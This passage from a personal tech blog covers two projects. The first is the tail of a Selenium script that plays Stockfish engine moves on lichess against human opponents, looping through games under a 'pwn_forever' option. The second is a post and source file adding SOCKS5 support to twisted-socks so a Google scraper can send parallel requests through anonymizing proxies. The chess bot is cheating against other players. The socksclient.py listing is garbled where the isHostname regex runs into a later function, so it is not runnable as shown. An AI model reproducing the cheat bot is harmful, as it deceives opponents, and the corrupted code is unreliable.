<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">6</span><span class="p">):</span>
<span class="n">action</span> <span class="o">=</span> <span class="n">ActionChains</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
<span class="n">action</span><span class="o">.</span><span class="n">drag_and_drop</span><span class="p">(</span><span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_id</span><span class="p">(</span><span class="n">f</span><span class="p">),</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_id</span><span class="p">(</span><span class="n">t</span><span class="p">))</span>
<span class="n">action</span><span class="o">.</span><span class="n">perform</span><span class="p">()</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">moved</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_elements_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs'</span><span class="p">)</span>
<span class="n">move1</span><span class="p">,</span> <span class="n">move2</span> <span class="o">=</span> <span class="n">moved</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">),</span> <span class="n">moved</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span>
<span class="k">if</span> <span class="n">t</span> <span class="o">==</span> <span class="n">move1</span> <span class="ow">or</span> <span class="n">f</span> <span class="o">==</span> <span class="n">move1</span><span class="p">:</span>
<span class="k">break</span>
<span class="k">except</span> <span class="ne">Exception</span><span class="p">:</span>
<span class="k">break</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mf">.2</span><span class="p">)</span>
<span class="k">return</span> <span class="n">move</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">def</span> <span class="nf">get_last_move</span><span class="p">(</span><span class="n">moves</span><span class="o">=</span><span class="p">[]):</span>
<span class="n">WebDriverWait</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">presence_of_element_located</span><span class="p">((</span><span class="n">By</span><span class="o">.</span><span class="n">CSS_SELECTOR</span><span class="p">,</span> <span class="s1">'div.moved.lcs'</span><span class="p">)))</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs div.piece'</span><span class="p">)</span><span class="o">.</span><span class="n">find_element_by_xpath</span><span class="p">(</span><span class="s1">'..'</span><span class="p">)</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="p">[</span><span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_elements_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs'</span><span class="p">)</span> <span class="k">if</span> <span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="o">!=</span> <span class="n">t</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="c1"># If the last move on the board is our own, sleep briefly and poll again until the opponent has moved</span>
<span class="k">if</span> <span class="n">moves</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="n">f</span><span class="o">+</span><span class="n">t</span><span class="p">,</span> <span class="n">moves</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">])</span>
<span class="k">while</span> <span class="n">f</span><span class="o">+</span><span class="n">t</span> <span class="o">==</span> <span class="n">moves</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span>
<span class="c1"># busy polling, that's very inefficient</span>
<span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mf">.35</span><span class="p">)</span>
<span class="n">t</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs div.piece'</span><span class="p">)</span><span class="o">.</span><span class="n">find_element_by_xpath</span><span class="p">(</span><span class="s1">'..'</span><span class="p">)</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span>
<span class="n">f</span> <span class="o">=</span> <span class="p">[</span><span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_elements_by_css_selector</span><span class="p">(</span><span class="s1">'div.moved.lcs'</span><span class="p">)</span> <span class="k">if</span> <span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'id'</span><span class="p">)</span> <span class="o">!=</span> <span class="n">t</span><span class="p">][</span><span class="mi">0</span><span class="p">]</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_css_selector</span><span class="p">(</span><span class="s1">'div.table_with_clock.finished'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">except</span> <span class="n">NoSuchElementException</span><span class="p">:</span>
<span class="k">pass</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i]Opponent moved </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">f</span><span class="o">+</span><span class="n">t</span><span class="p">))</span>
<span class="k">return</span> <span class="n">f</span><span class="o">+</span><span class="n">t</span>
<span class="k">try</span><span class="p">:</span>
<span class="c1"># wait at most 100 seconds for an opponent</span>
<span class="n">wait</span> <span class="o">=</span> <span class="n">WebDriverWait</span><span class="p">(</span><span class="n">wd</span><span class="p">,</span> <span class="mi">100</span><span class="p">)</span>
<span class="c1"># wait until the square a1 is present which means we got a board</span>
<span class="n">element</span> <span class="o">=</span> <span class="n">wait</span><span class="o">.</span><span class="n">until</span><span class="p">(</span><span class="n">EC</span><span class="o">.</span><span class="n">presence_of_element_located</span><span class="p">((</span><span class="n">By</span><span class="o">.</span><span class="n">ID</span><span class="p">,</span><span class="s1">'a1'</span><span class="p">)))</span>
<span class="k">except</span> <span class="n">TimeoutException</span> <span class="k">as</span> <span class="n">te</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"No board found: </span><span class="si">{}</span><span class="s2">"</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">te</span><span class="p">))</span>
<span class="n">sys</span><span class="o">.</span><span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'We got a board, games beginning...'</span><span class="p">)</span>
<span class="n">moves</span> <span class="o">=</span> <span class="p">[]</span>
<span class="c1"># detect what color we play</span>
<span class="n">players</span> <span class="o">=</span> <span class="n">wd</span><span class="o">.</span><span class="n">find_elements_by_css_selector</span><span class="p">(</span><span class="s1">'.player > a'</span><span class="p">)</span>
<span class="c1"># any() keeps a match from being overwritten by a later player link</span>
<span class="n">is_black</span> <span class="o">=</span> <span class="nb">any</span><span class="p">(</span><span class="n">config</span><span class="p">[</span><span class="s1">'username'</span><span class="p">]</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'href'</span><span class="p">)</span> <span class="ow">and</span> <span class="s1">'black'</span> <span class="ow">in</span> <span class="n">e</span><span class="o">.</span><span class="n">get_attribute</span><span class="p">(</span><span class="s1">'class'</span><span class="p">)</span> <span class="k">for</span> <span class="n">e</span> <span class="ow">in</span> <span class="n">players</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i]Bot is playing </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">([</span><span class="s1">'white'</span><span class="p">,</span> <span class="s1">'black'</span><span class="p">][</span><span class="n">is_black</span><span class="p">]))</span>
<span class="k">if</span> <span class="ow">not</span> <span class="n">is_black</span><span class="p">:</span>
<span class="n">moves</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">move</span><span class="p">())</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'[i] Moves played: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">moves</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="s1">'</span><span class="se">\n\n</span><span class="s1">'</span><span class="p">)</span>
<span class="n">last</span> <span class="o">=</span> <span class="n">get_last_move</span><span class="p">(</span><span class="n">moves</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'last move found was </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">last</span><span class="p">))</span>
<span class="k">if</span> <span class="n">last</span><span class="p">:</span>
<span class="n">moves</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">last</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'no last move appended. Leaving: </span><span class="si">{}</span><span class="s1">'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">last</span><span class="p">))</span>
<span class="k">return</span>
<span class="n">m</span> <span class="o">=</span> <span class="n">move</span><span class="p">(</span><span class="n">moves</span><span class="p">)</span>
<span class="k">if</span> <span class="n">m</span><span class="p">:</span>
<span class="n">moves</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">wd</span><span class="o">.</span><span class="n">find_element_by_css_selector</span><span class="p">(</span><span class="s1">'div.table_with_clock.finished'</span><span class="p">)</span>
<span class="k">return</span>
<span class="k">except</span> <span class="n">NoSuchElementException</span><span class="p">:</span>
<span class="k">pass</span>
<span class="k">def</span> <span class="nf">go_forever</span><span class="p">():</span>
<span class="n">wd</span> <span class="o">=</span> <span class="n">login</span><span class="p">()</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">create_game</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
<span class="n">newgame_stockfish</span><span class="p">()</span>
<span class="n">play</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
<span class="n">wd</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">'http://en.lichess.org/'</span><span class="p">)</span>
<span class="n">quit_stockfish</span><span class="p">()</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="k">if</span> <span class="n">config</span><span class="p">[</span><span class="s1">'pwn_forever'</span><span class="p">]:</span>
<span class="n">go_forever</span><span class="p">()</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">wd</span> <span class="o">=</span> <span class="n">login</span><span class="p">()</span>
<span class="n">create_game</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
<span class="n">play</span><span class="p">(</span><span class="n">wd</span><span class="p">)</span>
</code></pre></div>Socks 5 client support for twisted2014-02-05T22:24:00+01:002014-02-05T22:24:00+01:00Nikolai Tschachertag:incolumitas.com,2014-02-05:/2014/02/05/socks-5-client-support-for-twisted/<p>I recently forked
<a href="https://github.com/ln5/twisted-socks" title="twisted socks client">twisted-socks</a>
to add SOCKS 5 support for my
<a href="http://incolumitas.com/googlescraper-py/" title="GoogleScraper">GoogleScraper</a>
in order to scrape Google pages asynchronously. I needed
SOCKS5 support to anonymize the parallel requests so that I can scrape
more pages simultaneously.</p>
<p>I tested the code for SOCKS4 and SOCKS4a against a local Tor proxy and
<code>twistd -n socks</code>, and the SOCKS5 protocol against the <a href="http://www.inet.no/dante/" title="dante">dante socks proxy
server</a> on my VPS. So I guess the
basic functionality should be working by now. GSSAPI (Kerberos)
<a href="https://tools.ietf.org/html/rfc1961">support</a> is planned.</p>
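<p>For readers who have not looked at the wire format before, here is a minimal sketch of the SOCKS5 messages a client exchanges for a CONNECT without authentication, following RFC 1928. It is written for Python 3, does not use Twisted, and is not taken from the socksclient code; the function names are made up for illustration, and the parser assumes the complete reply has already arrived.</p>

```python
import socket
import struct


def socks5_greeting(methods=(0x00,)):
    """Client greeting: VER, NMETHODS, METHODS (0x00 = no authentication)."""
    return struct.pack('!BB', 0x05, len(methods)) + bytes(methods)


def socks5_connect_request(host, port):
    """CONNECT request: VER, CMD=0x01, RSV, ATYP, DST.ADDR, DST.PORT."""
    try:
        # ATYP 0x01: host is a dotted-quad IPv4 literal
        addr = b'\x01' + socket.inet_pton(socket.AF_INET, host)
    except OSError:
        # ATYP 0x03: length-prefixed domain name, resolved by the proxy
        name = host.encode('idna')
        addr = b'\x03' + struct.pack('!B', len(name)) + name
    return struct.pack('!BBB', 0x05, 0x01, 0x00) + addr + struct.pack('!H', port)


def parse_socks5_reply(data):
    """Return (bound_address, bound_port) or raise ValueError on failure."""
    if len(data) < 4:
        raise ValueError('reply too short')
    version, reply, _rsv, atyp = struct.unpack('!BBBB', data[:4])
    if version != 0x05:
        raise ValueError('unexpected SOCKS version')
    if reply != 0x00:
        raise ValueError('proxy reported failure code %d' % reply)
    if atyp == 0x01:    # IPv4: 4 address bytes
        addr_end = 8
        address = socket.inet_ntoa(data[4:8])
    elif atyp == 0x03:  # domain name: 1 length byte, then the name
        addr_end = 5 + data[4]
        address = data[5:addr_end].decode('ascii')
    elif atyp == 0x04:  # IPv6: 16 address bytes
        addr_end = 20
        address = socket.inet_ntop(socket.AF_INET6, data[4:20])
    else:
        raise ValueError('unknown address type')
    (port,) = struct.unpack('!H', data[addr_end:addr_end + 2])
    return address, port
```

<p>A client would send <code>socks5_greeting()</code>, wait for the two-byte method selection, send <code>socks5_connect_request(host, port)</code> and hand the answer to <code>parse_socks5_reply()</code>. Passing a hostname instead of an IP address leaves DNS resolution to the proxy, which is what you want when scraping through Tor.</p>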
<p>Here is the socksclient code, which is also available in my GitHub
repository:</p>
<div class="highlight"><pre><span></span><code><span class="c1"># Copyright (c) 2011-2013, The Tor Project</span>
<span class="c1"># See LICENSE for the license.</span>
<span class="c1"># Updated on 25.01.14-28.01.14 to add SOCKS 5 support.</span>
<span class="c1"># Cleaned some parts of the code and abstracted quite a bit to handle the most important SOCKS5</span>
<span class="c1"># functionality like</span>
<span class="c1"># - username/password authentication</span>
<span class="c1"># - GSSAPI authentication (planned)</span>
<span class="c1"># - CONNECT command (the normal case; the others, UDP ASSOCIATE and BIND, aren't as important). Maybe I will add them</span>
<span class="c1"># in the future. If anyone wants to implement them, the basic structure is already here and the SOCKSv5ClientProtocol should be</span>
<span class="c1"># rather easy to extend. How listening for incoming connections (BIND) and opening a UDP connection (UDP ASSOCIATE)</span>
<span class="c1"># is done in the Twisted world is another question.</span>
<span class="c1"># Added:</span>
<span class="c1"># - SOCKSv4ClientFactory was renamed to SOCKSClientFactory and abstracted to handle SOCKS 4, 4a and 5 (it is still ONE protocol, so one factory should be logically correct)</span>
<span class="c1"># - added SOCKS5ClientFactory</span>
<span class="c1"># - SOCKSClientProtocol is the base class for all three protocols</span>
<span class="c1"># - SOCKSv4aClientProtocol inherits from SOCKSv4ClientProtocol. I made the deliberate choice to distinguish between SOCKS 4 and 4a: although 4a has exactly the same functionality as 4,</span>
<span class="c1"># it might be the case that servers only speak version 4.</span>
<span class="c1"># References:</span>
<span class="c1"># An actively maintained, recent version of PySocks: https://github.com/Anorov/PySocks</span>
<span class="c1"># The original version of socksclient.py:</span>
<span class="c1"># Author: Nikolai Tschacher</span>
<span class="c1"># Contact: incolumitas.com</span>
<span class="kn">import</span> <span class="nn">inspect</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">re</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">from</span> <span class="nn">zope.interface</span> <span class="kn">import</span> <span class="n">implements</span>
<span class="kn">from</span> <span class="nn">twisted.internet</span> <span class="kn">import</span> <span class="n">defer</span>
<span class="kn">from</span> <span class="nn">twisted.internet.interfaces</span> <span class="kn">import</span> <span class="n">IStreamClientEndpoint</span><span class="p">,</span> <span class="n">IReactorTime</span>
<span class="kn">from</span> <span class="nn">twisted.internet.protocol</span> <span class="kn">import</span> <span class="n">Protocol</span><span class="p">,</span> <span class="n">ClientFactory</span>
<span class="kn">from</span> <span class="nn">twisted.internet.endpoints</span> <span class="kn">import</span> <span class="n">_WrappingFactory</span>
<span class="k">class</span> <span class="nc">SOCKSError</span><span class="p">(</span><span class="ne">Exception</span><span class="p">):</span>
<span class="k">def</span> <span class="fm">__init__</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">val</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">val</span> <span class="o">=</span> <span class="n">val</span>
<span class="k">def</span> <span class="fm">__str__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="nb">repr</span><span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">val</span><span class="p">)</span>
<span class="k">class</span> <span class="nc">SOCKSClientProtocol</span><span class="p">(</span><span class="n">Protocol</span><span class="p">):</span>
<span class="sd">'''</span>
<span class="sd"> Base class for SOCKS protocols 4, 4a and 5</span>
<span class="sd"> '''</span>
<span class="n">buf</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">def</span> <span class="nf">noteTime</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">event</span><span class="p">):</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">_timestamps</span><span class="p">[</span><span class="n">event</span><span class="p">]</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">_timer</span><span class="o">.</span><span class="n">seconds</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">abort</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">errmsg</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">transport</span><span class="o">.</span><span class="n">loseConnection</span><span class="p">()</span>
<span class="bp">self</span><span class="o">.</span><span class="n">handshakeDone</span><span class="o">.</span><span class="n">errback</span><span class="p">(</span><span class="n">SOCKSError</span><span class="p">(</span><span class="s1">'SOCKS </span><span class="si">%s</span><span class="s1">: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="p">(</span><span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version'</span><span class="p">],</span> <span class="n">errmsg</span><span class="p">)))</span>
<span class="k">def</span> <span class="nf">isHostname</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">string</span><span class="p">):</span>
<span class="n">dns_label_regex</span> <span class="o">=</span> <span class="n">re</span><span class="o">.</span><span class="n">compile</span><span class="p">(</span><span class="sa">r</span><span class="s1">'^(?![0-9]+$)(?!-)[a-zA-Z0-9-]{,63}(?H", port)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">transport</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'RELAY_REQUEST_SENT'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">=</span> <span class="s1">'connection_requested'</span>
<span class="k">def</span> <span class="nf">verifySocksReply</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="n">where</span> <span class="o">=</span> <span class="s1">'SOCKS5 verifySocksReply'</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o"><</span> <span class="mi">10</span><span class="p">:</span> <span class="c1"># all hostnames are longer than an IPv4 address</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Too little data from server </span><span class="si">%s</span><span class="s1">.'</span> <span class="o">%</span> <span class="n">where</span><span class="p">)</span>
<span class="k">else</span><span class="p">:</span>
<span class="n">version</span><span class="p">,</span> <span class="n">reply</span><span class="p">,</span> <span class="n">rsv</span><span class="p">,</span> <span class="n">address_type</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'!BBBB'</span><span class="p">,</span> <span class="n">data</span><span class="p">[:</span><span class="mi">4</span><span class="p">])</span>
<span class="k">if</span> <span class="n">version</span> <span class="o">!=</span> <span class="mh">0x5</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Invalid version'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="n">reply</span> <span class="o">!=</span> <span class="mh">0x0</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Server reply indicates failure. Reason: </span><span class="si">%s</span><span class="s1">'</span> <span class="o">%</span> <span class="bp">self</span><span class="o">.</span><span class="n">SOCKS5_ERRORS</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">reply</span><span class="p">,</span> <span class="s2">"Unknown error"</span><span class="p">))</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="k">if</span> <span class="n">address_type</span> <span class="o">==</span> <span class="mh">0x1</span><span class="p">:</span> <span class="c1"># handle IPv4 address</span>
<span class="bp">self</span><span class="o">.</span><span class="n">bound_address</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">bound_port</span> <span class="o">=</span> <span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">inet_ntoa</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">8</span><span class="p">]),</span>
<span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'>H'</span><span class="p">,</span> <span class="n">data</span><span class="p">[</span><span class="mi">8</span><span class="p">:</span><span class="mi">10</span><span class="p">])[</span><span class="mi">0</span><span class="p">])</span>
<span class="k">elif</span> <span class="n">address_type</span> <span class="o">==</span> <span class="mh">0x3</span><span class="p">:</span> <span class="c1"># handle domain name</span>
<span class="n">dns_name_len</span> <span class="o">=</span> <span class="nb">ord</span><span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">5</span><span class="p">])</span>
<span class="c1"># the name occupies dns_name_len bytes starting at offset 5</span>
<span class="bp">self</span><span class="o">.</span><span class="n">bound_address</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">bound_port</span> <span class="o">=</span> <span class="p">(</span><span class="n">data</span><span class="p">[</span><span class="mi">5</span><span class="p">:(</span><span class="mi">5</span><span class="o">+</span><span class="n">dns_name_len</span><span class="p">)],</span>
<span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'>H'</span><span class="p">,</span> <span class="n">data</span><span class="p">[(</span><span class="mi">5</span><span class="o">+</span><span class="n">dns_name_len</span><span class="p">):(</span><span class="mi">5</span><span class="o">+</span><span class="n">dns_name_len</span><span class="o">+</span><span class="mi">2</span><span class="p">)])[</span><span class="mi">0</span><span class="p">])</span>
<span class="k">elif</span> <span class="n">address_type</span> <span class="o">==</span> <span class="mh">0x4</span><span class="p">:</span> <span class="c1"># handle IPv6 address</span>
<span class="bp">self</span><span class="o">.</span><span class="n">bound_address</span><span class="p">,</span> <span class="bp">self</span><span class="o">.</span><span class="n">bound_port</span> <span class="o">=</span> <span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">inet_ntop</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET6</span><span class="p">,</span> <span class="n">data</span><span class="p">[</span><span class="mi">4</span><span class="p">:</span><span class="mi">20</span><span class="p">]),</span>
<span class="n">struct</span><span class="o">.</span><span class="n">unpack</span><span class="p">(</span><span class="s1">'>H'</span><span class="p">,</span> <span class="n">data</span><span class="p">[</span><span class="mi">20</span><span class="p">:</span><span class="mi">22</span><span class="p">])[</span><span class="mi">0</span><span class="p">])</span>
<span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">=</span> <span class="s1">'connection_verified'</span>
<span class="k">return</span> <span class="kc">True</span>
<span class="k">def</span> <span class="nf">connectionMade</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'CONNECTED'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'NEGOTIATE_AUTH_METHOD'</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">negotiateAuthenticationMethod</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">dataReceived</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">data</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">buf</span> <span class="o">+=</span> <span class="n">data</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">==</span> <span class="s1">'do_auth'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">authenticate</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">==</span> <span class="s1">'check_auth'</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">checkAuth</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">==</span> <span class="s1">'authenticated'</span><span class="p">:</span>
<span class="n">host</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span><span class="o">.</span><span class="n">_host</span>
<span class="n">port</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">postHandshakeEndpoint</span><span class="o">.</span><span class="n">_port</span>
<span class="bp">self</span><span class="o">.</span><span class="n">sendRelayRequest</span><span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span>
<span class="k">elif</span> <span class="bp">self</span><span class="o">.</span><span class="n">protocol_state</span> <span class="o">==</span> <span class="s1">'connection_requested'</span><span class="p">:</span>
<span class="k">if</span> <span class="bp">self</span><span class="o">.</span><span class="n">verifySocksReply</span><span class="p">(</span><span class="n">data</span><span class="p">):</span>
<span class="bp">self</span><span class="o">.</span><span class="n">setupRelay</span><span class="p">()</span>
<span class="k">class</span> <span class="nc">SOCKSv4ClientProtocol</span><span class="p">(</span><span class="n">SOCKSClientProtocol</span><span class="p">):</span>
<span class="n">SOCKS4_ERRORS</span> <span class="o">=</span> <span class="p">{</span>
<span class="mh">0x5B</span><span class="p">:</span> <span class="s2">"Request rejected or failed"</span><span class="p">,</span>
<span class="mh">0x5C</span><span class="p">:</span> <span class="s2">"Request rejected because SOCKS server cannot connect to identd on the client"</span><span class="p">,</span>
<span class="mh">0x5D</span><span class="p">:</span> <span class="s2">"Request rejected because the client program and identd report different user-ids"</span>
<span class="p">}</span>
<span class="k">def</span> <span class="nf">sendRelayRequest</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">host</span><span class="p">,</span> <span class="n">port</span><span class="p">):</span>
<span class="n">username</span> <span class="o">=</span> <span class="bp">self</span><span class="o">.</span><span class="n">proxy_config</span><span class="p">[</span><span class="s1">'version_specific'</span><span class="p">][</span><span class="s1">'username'</span><span class="p">]</span>
<span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">username</span> <span class="o">=</span> <span class="mh">0x4</span><span class="p">,</span> <span class="mh">0x1</span><span class="p">,</span> <span class="n">username</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span> <span class="o">+</span> <span class="sa">b</span><span class="s1">'</span><span class="se">\x00</span><span class="s1">'</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">addr</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">inet_aton</span><span class="p">(</span><span class="n">host</span><span class="p">)</span>
<span class="k">except</span> <span class="n">socket</span><span class="o">.</span><span class="n">error</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">abort</span><span class="p">(</span><span class="s1">'Not a valid IPv4 address.'</span><span class="p">)</span>
<span class="k">return</span> <span class="kc">False</span>
<span class="n">msg</span> <span class="o">=</span> <span class="n">struct</span><span class="o">.</span><span class="n">pack</span><span class="p">(</span><span class="s1">'!BBH'</span><span class="p">,</span> <span class="n">ver</span><span class="p">,</span> <span class="n">cmd</span><span class="p">,</span> <span class="n">port</span><span class="p">)</span> <span class="o">+</span> <span class="n">addr</span> <span class="o">+</span> <span class="n">username</span>
<span class="bp">self</span><span class="o">.</span><span class="n">transport</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">msg</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">noteTime</span><span class="p">(</span><span class="s1">'REQUEST'</span><span class="p">)</span>
